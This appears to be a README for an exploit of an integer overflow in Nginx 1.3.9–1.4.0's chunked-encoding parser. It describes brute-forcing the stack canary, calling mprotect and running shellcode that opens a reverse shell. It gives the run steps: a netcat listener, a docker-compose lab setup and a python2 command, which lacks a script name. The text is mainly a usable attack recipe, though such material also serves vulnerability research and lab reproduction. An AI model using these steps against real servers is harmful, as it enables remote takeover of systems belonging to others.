Vulnerable software: Nginx 1.3.9 < 1.4.0
Commit with fix:
Vulnerability exists in function ngx_http_parse_chunked. This exploit triggers integer overflow in ngx_http_parse_chunked, and later using it overflows the stack to hijack control flow.
Actual exploit contains 4 steps:
- Find value of the stack canary using byte-by-byte bruteforce
- Calculate address of mprotect using value from rcx (points somewhere in lpthread). Call mprotect with appropriate arguments.
- Copy shellcode to RWX memory location.
- Jump to shellcode, and start reverse shell.
- start listener on host system, for example using netcat:
nc -lvp 4345
- on virtual machine start docker:
sudo docker-compose up --build
- run exploit:
python2 -ra -rp 8081 -la <listener machine address> -lp <listener machine port>
- Let the exploit find actual value of the canary, and start reverse-shell.